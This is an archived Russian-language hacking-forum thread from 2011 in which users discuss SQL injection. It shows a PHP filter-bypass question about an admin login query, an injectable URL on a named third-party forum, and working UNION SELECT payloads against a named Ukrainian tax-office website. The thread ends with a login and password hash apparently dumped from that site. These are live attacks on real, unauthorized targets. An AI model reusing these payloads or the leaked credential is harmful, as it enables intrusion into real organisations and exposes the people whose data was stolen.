ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.12.2011, 19:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Есть такой вот фильтр
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$filter[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]] = array([/COLOR][COLOR="#DD0000"]"select"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"delete"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"union"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"update"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"insert"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\\"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]","[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"--"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"-"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"%20"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"%27"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"`"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"="[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"%"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$filter[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$op[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]) );
[/COLOR][/COLOR]
И есть запрос в бд в котором он обрабатывает объект
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM admin WHERE login='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Обойти select,union можно пробелом внутри, в качестве разделителя /**/, запятые тоже не проблема. Не получается обойти кавычку, можно ли как то обойти это не пользуясь уязвимостями с мультибатовыми кодировками ? Ибо сменить ее нет возможности, может у кого есть другое решение... |
|
|
|
03.12.2011, 19:39
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме:
15756
Репутация:
0
|
|
Сообщение от trololoman96
trololoman96 said:
можно ли как то обойти это не пользуясь уязвимостями с мультибатовыми кодировками ? Ибо сменить ее нет возможности, может у кого есть другое решение...
Ничего ты тут не сделаешь
UPD
Я надеюсь что там с данными ничего не происходит, и именно $data попадает в $this->adm_name, и поиск идёт по $filter[3], а то может эти куски отношения друг к другу не имеют )
|
|
|
03.12.2011, 20:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Так и есть, $data передается в запрос и поиск идёт по $filter[3]. Код этот используется для авторизации в админку
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sel[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]Query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM admin WHERE login='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]NumRows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sel[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]FetchArray[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sel[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_pass[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'acplogin'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'acppass'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]adm_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"admin.php"[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"admin.php?err=pError"[/COLOR][COLOR="#007700"]);
}
[/COLOR][/COLOR]
все портит эта кавычка |
|
|
|
03.12.2011, 23:43
|
|
Новичок
Регистрация: 01.11.2009
Сообщений: 0
Провел на форуме:
28494
Репутация:
0
|
|
Vbulletin 4.1.7
Код:
Code:
http://fpteam-cheats.com/board/post_thanks.php?do=post_thanks_remove_user&='
Можно ли из этого что-то извлечь? |
|
|
|
04.12.2011, 00:16
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765
Репутация:
257
|
|
Сообщение от SHADOW785
SHADOW785 said:
Vbulletin 4.1.7
Код:
Code:
http://fpteam-cheats.com/board/post_thanks.php?do=post_thanks_remove_user&='
Можно ли из этого что-то извлечь? Нет, просто ошибка коннекта к бд. Тут дело даже не в кавычке, а в параметре post_thanks_remove_user
|
|
|
|
04.12.2011, 01:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
183267
Репутация:
84
|
|
Код:
Code:
http://www.nalog.od.ua/l.php?id=288+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+--+
Не шарю как вывести |
|
|
|
04.12.2011, 01:10
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от shadowrun
shadowrun said:
Код:
Code:
http://www.nalog.od.ua/l.php?id=288+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+--+
Не шарю как вывести http://www.nalog.od.ua/l.php?id=-288+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
что вывести то?
|
|
|
|
04.12.2011, 01:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
183267
Репутация:
84
|
|
Сообщение от Gorev
Gorev said:
http://www.nalog.od.ua/l.php?id=-288+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
что вывести то?
Попробуй по ссылке перейти, поймешь. Ток проксю юзай, налоговики из ЮА настолько суровые...
|
|
|
|
04.12.2011, 01:15
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от shadowrun
shadowrun said:
Попробуй по ссылке перейти, поймешь. Ток проксю юзай, налоговики из ЮА настолько суровые...
natasha:0444730b0844225c
что именно понять то?
|
|
|
|
04.12.2011, 01:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
183267
Репутация:
84
|
|
Сообщение от Gorev
Gorev said:
natasha:0444730b0844225c
что именно понять то?
бляяяя Я не увидел где оно выводит .
Gorev, спасибо!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
